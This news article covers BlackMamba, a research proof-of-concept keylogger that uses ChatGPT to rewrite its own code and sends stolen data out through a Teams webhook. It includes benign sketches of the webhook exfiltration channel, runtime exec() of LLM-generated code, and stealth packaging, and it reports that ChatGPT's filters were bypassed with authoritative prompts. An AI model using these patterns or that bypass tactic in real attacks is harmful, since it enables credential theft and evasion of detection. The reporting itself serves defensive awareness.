ChatGPT-powered polymorphic Blackmamba malware evades detection
By Deeba Ahmed

The ChatGPT-powered Blackmamba malware works as a keylogger, with the ability to send stolen credentials through Microsoft Teams.
**The malware can target Windows, macOS, and Linux devices.**
HYAS Institute researcher and cybersecurity expert Jeff Sims has developed a new type of ChatGPT-powered malware named Blackmamba, which can bypass Endpoint Detection and Response (EDR) filters.
This should not come as a surprise: in January of this year, cybersecurity researchers at CyberArk reported on how ChatGPT could be used to develop polymorphic malware. During their investigation, the researchers managed to create polymorphic malware by bypassing ChatGPT's content filters, using an authoritative tone in their prompts.
According to the HYAS Institute's report (PDF), the malware can gather sensitive data such as usernames, passwords, and debit/credit card numbers, along with any other confidential information a user enters on their device.
The ChatGPT-powered Blackmamba keylogger in action (Screenshot credit: Jeff Sims)
Once it captures the data, Blackmamba uses a Microsoft Teams webhook to transfer it to the attacker's Teams channel, where it is "analyzed, sold on the dark web, or used for other nefarious purposes," according to the report.
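For context, posting to a Teams incoming webhook is a single HTTP call. The minimal sketch below shows the mechanism the report describes; the webhook URL is a hypothetical placeholder (real URLs are generated per channel when an incoming webhook connector is configured), and the message is benign:

```python
import requests

# Hypothetical placeholder; real webhook URLs are issued per channel
# when an incoming webhook connector is added in Teams.
WEBHOOK_URL = "https://example.webhook.office.com/webhookb2/abc123"

def post_to_teams(message: str) -> None:
    # Incoming webhooks accept a simple JSON payload; "text" becomes
    # the body of the message posted to the channel.
    response = requests.post(WEBHOOK_URL, json={"text": message}, timeout=10)
    response.raise_for_status()

post_to_teams("captured data would be relayed like this")
```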
Jeff used MS Teams because it gave him access to an organization's internal communications. And since Teams is connected to many other vital tools, such as Slack, identifying valuable targets becomes more manageable.
Leveraging the chatbot's language capabilities, Jeff created a polymorphic keylogger powered by ChatGPT that randomly modifies its own code based on the user's input.
The researcher wrote the keylogger in Python 3 and generated a unique Python script by running Python's exec() function every time the chatbot was summoned. This means that whenever ChatGPT/text-davinci-003 is invoked, it writes a fresh, unique Python script for the keylogger, as sketched below.
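The report does not publish the malware's source, but the generate-then-execute pattern it describes can be roughly sketched as follows. This is a benign illustration assuming the legacy OpenAI completions API that served text-davinci-003; the prompt requests a harmless greet() function rather than keylogging logic, and the API key is a placeholder:

```python
import openai

openai.api_key = "sk-..."  # hypothetical placeholder key

PROMPT = "Write a Python function named greet() that prints a short greeting."

def fetch_and_run() -> None:
    # Legacy completions endpoint that served text-davinci-003.
    completion = openai.Completion.create(
        model="text-davinci-003",
        prompt=PROMPT,
        max_tokens=200,
        temperature=1.0,  # higher temperature yields more varied code per call
    )
    generated_code = completion.choices[0].text
    namespace: dict = {}
    # exec() compiles and runs the freshly generated source in memory,
    # so no fixed payload is ever written to disk.
    exec(generated_code, namespace)
    namespace["greet"]()  # call the function defined at runtime

fetch_and_run()
```

Because the source text differs on every API call, no two executions present the same bytes to a scanner, even though the behavior is identical.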
This makes the malware polymorphic and lets it slip past EDR tools. Attackers can use ChatGPT to keep modifying the code, making it more elusive, and can even develop programs that malware and ransomware authors use to launch their attacks.
Researcher’s discussion with ChatGPT
Jeff made the malware shareable and portable by employing auto-py-to-exe, a free, open-source utility that converts Python code into standalone executables, which can be built for Windows, macOS, and Linux systems. The malware can then be delivered into the targeted environment via email or social engineering.
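auto-py-to-exe is a graphical front end for PyInstaller, so the equivalent packaging step can be sketched programmatically. The script name below is hypothetical, and the output format matches the build platform (an .exe on Windows, a native binary on macOS or Linux):

```python
import PyInstaller.__main__

# "payload.py" is a hypothetical script name for illustration only.
PyInstaller.__main__.run([
    "--onefile",    # bundle the interpreter and dependencies into one file
    "--noconsole",  # suppress the console window on Windows
    "payload.py",
])
```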
It is clear that as ChatGPT’s machine learning capabilities advance, such threats will continue to emerge and may become more sophisticated and challenging to detect over time. Automated security controls are not infallible, so organizations must remain proactive in developing and implementing their cybersecurity strategies to protect against such threats.
What is polymorphic malware?
Polymorphic malware is a type of malicious software that changes its code and appearance every time it replicates or infects a new system. This makes it difficult for traditional signature-based antivirus software to detect and analyze, because the malware looks different on every infection even though it performs the same malicious functions.
Polymorphic malware typically achieves this through obfuscation techniques such as encryption, code modification, and varying compression methods. It can also mutate in real time, generating new code with a unique signature to evade detection by security software.
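A benign sketch makes the signature problem concrete: two snippets that behave identically but use randomized identifiers produce entirely different SHA-256 digests, which is exactly what defeats hash- and signature-based matching:

```python
import hashlib
import random
import string

# A harmless code template; only the identifier names vary per variant.
TEMPLATE = "def {fn}():\n    {var} = 'hello'\n    print({var})\n"

def random_name(length: int = 8) -> str:
    return "".join(random.choices(string.ascii_lowercase, k=length))

def make_variant() -> str:
    # Same behavior every time, different source text every time.
    return TEMPLATE.format(fn=random_name(), var=random_name())

a, b = make_variant(), make_variant()
print(hashlib.sha256(a.encode()).hexdigest())
print(hashlib.sha256(b.encode()).hexdigest())  # a different "signature"
```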
The use of polymorphic malware has become more common in recent years as cybercriminals seek new ways to bypass traditional security measures. Its ability to morph and rewrite its own code makes it hard for security researchers to develop effective countermeasures, and a significant threat to organizations and individuals alike.
- ARMO integrates ChatGPT to secure Kubernetes
- Scammers Pose as ChatGPT in New Phishing Scam
- Russian Hackers Eager to Bypass ChatGPT Restrictions